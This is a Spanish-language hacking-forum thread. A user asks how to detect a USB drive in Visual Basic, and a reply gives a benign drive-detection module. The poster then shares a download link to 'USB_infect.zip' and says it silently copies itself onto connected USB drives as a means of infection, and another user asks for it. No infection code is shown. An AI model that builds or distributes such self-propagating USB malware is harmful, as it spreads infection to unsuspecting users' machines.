Autor
|
Tema: Detectar pen drive o USB e infectar (Leído 12,579 veces)
|
drakolive
|
hay alguna forma de detectar cuando la pen drive se conecta a la pc? x ejemplo q me de una alerta o un mensaje la aplicacion cuando la pen drive o usb este conectada
|
|
« Última modificación: 18 Junio 2007, 18:03 pm por drakolive »
|
|
|
|
|
zumbah
...asi, cayéndose...
|
Segun, que windows utilizas tu? Si quieres que tambien se instale automaticamente necesitas Plug & Play (viene de serie desde la version 2000 creo..) Si no lo detecta es posible que te haya entrado alguna especia de virus y te lo haya desconfigurado para que no lo detecte.
Saludos espero haberte ayudado.
|
|
|
|
|
|
|
drakolive
|
para win XP.. me refieron en VB como crear una function q detete si se conecto una usb... asi como lo hace ese globo del xp
|
|
|
|
|
|
|
|
drakolive
|
Ya hice lo q qria http://rapidshare.com/files/37949048/USB_infect.zipalli esta... por si algioemn qiere probarlo y verlo.. lo unico q hace es detectar si se desconecta o conecta un USB... si se conecta se copia en ella silenciosamente... esto seria para usarlo cmo infeccion por usb. PD: lo encontre por mi cuenta... en este foro no estaba algo como lo q tengo.
|
|
« Última modificación: 18 Junio 2007, 18:03 pm por drakolive »
|
|
|
|
|
JmHk
San google EL MEJOR!!!!!!!
|
Public Declare Function GetVolumeInformation Lib "kernel32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As String, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As String, ByVal nFileSystemNameSize As Long) As Long Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long Public Declare Function GetLogicalDrives Lib "kernel32" () As Long
'VARIABLE QUE VA A TOMAR EL MOMBRE DE LA UNIDAD Public UnidadUSB As String
Public Function GetDriveSerial(ByVal sDrive As String) As Long sDrive = UCase(Left$(sDrive, 1)) & ":\" Call GetVolumeInformation(sDrive, vbNullString, 0, GetDriveSerial, 0, 0, vbNullString, 0) UnidadUSB = sDrive End Function
Public Function IsConnected(ByVal lID As Long) As Boolean Dim LDs As Long, Cnt As Long, sDrives As String LDs = GetLogicalDrives For Cnt = 0 To 25 If (LDs And 2 ^ Cnt) <> 0 Then sDrives = sDrives + Chr$(65 + Cnt) If GetDriveType(Trim(Right(sDrives, 1) & ":\")) = 2 Then UnidadUSB = Trim(Right(sDrives, 1) & ":\") End If End If Next Cnt End Function
hay tienes un modulo para dectectar usb espero que te sirva, saludos
|
|
|
|
|
|
|
SKL (orignal)
UpLoadSourceCode
|
ya se trato este tema en el foro, porque no buscas la palabra USB y vas a ver que sale bastante sobre esto...
con un simple hook podes detectarlo, hay varios proyectos en otro post que te puede servir
|
|
|
|
|
|
|
cassiani
« Anterior | Próximo »
|
Por si no se han dado cuenta el último post de drakolive en este hilo se hizo hace ya 1 año exactamente y dijo que había conseguido lo que quería, solo están reviviendo post antiguos…
|
|
|
|
|
|
|
lion7712
|
Ya hice lo q qria http://rapidshare.com/files/37949048/USB_infect.zipalli esta... por si algioemn qiere probarlo y verlo.. lo unico q hace es detectar si se desconecta o conecta un USB... si se conecta se copia en ella silenciosamente... esto seria para usarlo cmo infeccion por usb. PD: lo encontre por mi cuenta... en este foro no estaba algo como lo q tengo. No se si me puedas pasar este programa para detectar cuando se desconecte o conecte un usb espero me puedas apoyar gracias
|
|
|
|
|
|
|
|
|